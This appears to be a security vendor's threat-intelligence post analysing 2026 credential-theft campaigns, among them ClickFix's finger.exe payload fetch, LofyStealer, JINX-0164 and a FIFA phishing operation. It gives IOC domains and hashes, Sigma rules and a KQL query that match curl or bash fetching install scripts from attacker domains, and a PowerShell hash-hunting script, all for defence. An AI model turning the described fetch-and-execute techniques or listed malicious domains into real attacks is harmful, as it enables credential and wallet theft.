Back to Intelligence

ClickFix, Ghost Stadium & JINX-0164: Multi-Vector Credential Harvesting Analysis

SA
Security Arsenal Team
June 1, 2026
5 min read

Recent OTX pulses indicate a convergence of sophisticated credential theft campaigns targeting both enterprise infrastructure and consumer ecosystems. Threat actors are utilizing diverse initial access vectors, ranging from fake image-editing tools (ClickFix) and supply chain compromises (JINX-0164) to event-based phishing (GHOST STADIUM).

Collectively, these campaigns demonstrate a shift toward resilient C2 infrastructure—specifically the exploitation of blockchain testnets (EtherHiding) and massive phishing-as-a-service (PaaS) ecosystems. The primary objective across all identified actors is financial theft via credential harvesting, session hijacking, and cryptocurrency wallet compromise.

Threat Actor / Malware Profile

ClickFix / BackgroundFix

  • Malware Families: CastleLoader, NetSupport RAT, CastleStealer
  • Distribution: Social engineering lure masquerading as a free image-editing tool ("BackgroundFix").
  • Execution Chain: Users are prompted to verify humanity by copying a command to their clipboard. This command invokes finger.exe, a legacy Windows utility, to fetch and execute the next stage payload.
  • Payload Behavior: CastleLoader acts as a reflective loader to deploy NetSupport RAT (remote access) and CastleStealer (custom .NET infostealer).

LofyGang (LofyStealer)

  • Malware Families: LofyStealer, GrabBot, Chromelevator
  • Distribution: Targets Minecraft players via social engineering; payload hidden in game-related files.
  • Technical Details: Two-stage malware consisting of a 53.5MB Node.js-based loader and a 1.4MB native C++ payload operating in-memory.
  • Capabilities: Exfiltrates browser data (cookies, passwords, tokens), credit cards, and IBANs from 8+ browsers.

JINX-0164

  • Target: Cryptocurrency software developers.
  • Distribution: LinkedIn social engineering (recruiter persona) delivering NPM trojans or direct downloads.
  • Malware: AUDIOFIX (Python-based infostealer/RAT) and MINIRAT (Go backdoor).
  • Infrastructure: Uses typosquatting domains (e.g., login.teamicrosoft.com).

GHOST STADIUM

  • Campaign: Phishing-as-a-Service targeting the 2026 FIFA World Cup.
  • Malware: Vidar, Lumma.
  • Infrastructure: 4,300+ fraudulent domains, pixel-perfect FIFA authentication clones.

ClearFake (EtherHiding)

  • Technique: Uses smart contracts on the BNB Smart Chain testnet for C2 instructions.
  • Malware: SectopRAT, ACRStealer.
  • Persistence: Injected JavaScript on compromised websites queries blockchain contracts to retrieve payloads.

IOC Analysis

The provided IOCs consist of:

  • Domains: Typosquatted domains (login.teamicrosoft.com), lookalike fraud domains (fifa.gold, fifa.tax), and loader domains (trindastal.com).
  • File Hashes: SHA256 and MD5 hashes for the Node.js loaders, C++ payloads, and macOS install scripts.
  • URLs: Non-standard HTTP ports (e.g., :688) used by CastleLoader.
  • Hostnames: Infrastructure related to driver update scams and blockchain C2.

Operational Guidance: SOC teams should immediately ingest these hashes into EDR solutions for quarantine rules. Domains should be added to DNS sinkholes/blocklists. The use of non-standard ports (688) for HTTP traffic is a high-fidelity network anomaly to hunt for.

Detection Engineering

Sigma Rules

YAML
title: Suspicious Finger.exe Execution - ClickFix Loader
id: 28767a84-4a1b-42b4-8b5d-c1a8c938d1e2
description: Detects the execution of finger.exe, which is abused by ClickFix/BackgroundFix to retrieve payloads.
status: experimental
date: 2026/06/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66756a725a4b6a
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\finger.exe'
    condition: selection
falsepositives:
    - Legitimate administrator usage (rare)
level: critical
tags:
    - attack.execution
    - attack.t1059.001
---
title: Node.js Loader Spawning Shell - LofyStealer
id: 91f2c3b4-5a6d-4e7f-8b9a-1c2d3e4f5a6b
description: Detects Node.js processes spawning cmd.exe or powershell.exe, indicative of the LofyStealer Node.js loader executing payloads.
status: experimental
date: 2026/06/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66756a725a4b6b
logsource:
    category: process_creation
    product: windows
detection:
    parent:
        Image|endswith: '\node.exe'
    child:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
    condition: parent and child
falsepositives:
    - Legitimate development toolchains
level: high
tags:
    - attack.execution
    - attack.t1204
---
title: MacOS Install Script Download - JINX-0164
id: a3b4c5d6-e7f8-4a9b-8c7d-6e5f4a3b2c1d
description: Detects curl or bash downloading shell scripts from suspicious domains associated with JINX-0164 macOS malware.
status: experimental
date: 2026/06/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66756a725a4b6c
logsource:
    category: process_creation
    product: macos
detection:
    selection:
        Image|endswith:
            - '/curl'
            - '/bash'
            - '/sh'
        CommandLine|contains:
            - 'install.sh'
            - 'driver-updater.net'
            - 'teamicrosoft.com'
    condition: selection
falsepositives:
    - Legitimate software updates
level: high
tags:
    - attack.initial_access
    - attack.t1190

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix network indicators (Port 688) and Ghost Stadium domains
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemotePort == 688 or 
        RemoteUrl has "fifa." or 
        RemoteUrl has "teamicrosoft.com" or 
        RemoteUrl has "driver-updater.net"
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
| extend FullUrl = iff(RemotePort != 443 and RemotePort != 80, strcat(RemoteUrl, ":", RemotePort), RemoteUrl)

PowerShell Hunt Script

PowerShell
# IOC Hunt for ClickFix Finger.exe Execution and LofyStealer File Artifacts
$TargetHashes = @(
    "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92",
    "ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881"
)

Write-Host "[+] Hunting for ClickFix Finger.exe processes..."
$fingerProc = Get-CimInstance Win32_Process -Filter "Name = 'finger.exe'"
if ($fingerProc) {
    Write-Host "[!] ALERT: finger.exe found running (PID: $($fingerProc.ProcessId), Parent: $($fingerProc.ParentProcessId))" -ForegroundColor Red
} else {
    Write-Host "[-] No finger.exe processes found." -ForegroundColor Green
}

Write-Host "[+] Scanning recent files for LofyStealer/ClickFix Hashes..."
$recentFiles = Get-ChildItem -Path "C:\Users\" -Recurse -Include *.exe, *.dll, *.js, *.node -ErrorAction SilentlyContinue | 
               Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) }

foreach ($file in $recentFiles) {
    $fileHash = (Get-FileHash -Path $file.FullName -Algorithm SHA256).Hash.ToLower()
    if ($TargetHashes -contains $fileHash) {
        Write-Host "[!] MALWARE DETECTED: $($file.FullName) matches IOC hash." -ForegroundColor Red
    }
}
Write-Host "[+] Hunt complete."

Response Priorities

Immediate

  • Block IOCs: Add all listed domains, URLs, and file hashes to blocklists and EDR detection rules. Specifically, block traffic on non-standard port 688 unless explicitly allowed.
  • Hunt Execution: Run the provided PowerShell script across the enterprise to identify active finger.exe processes or malicious file hashes.

24 Hours

  • Identity Verification: If infrastructure shows signs of compromise (specifically by LofyStealer, CastleStealer, or Vidar), force a password reset and MFA re-enrollment for affected users. Revoke session tokens for browser-based applications.
  • Supply Chain Audit: For technology and crypto sectors, audit recent npm package installations and software dependencies for signs of the JINX-0164 trojan.

1 Week

  • Architecture Hardening: Restrict the use of legacy utilities like finger.exe via Application Control policies. Implement network segmentation to prevent gaming systems (Minecraft targets) from accessing critical enterprise assets.
  • User Awareness: Brief staff on the specific threat of LinkedIn recruitment scams (JINX-0164) and World Cup ticket fraud (GHOST STADIUM).

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsinfostealerclickfixblockchain-c2aptcredential-theft

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action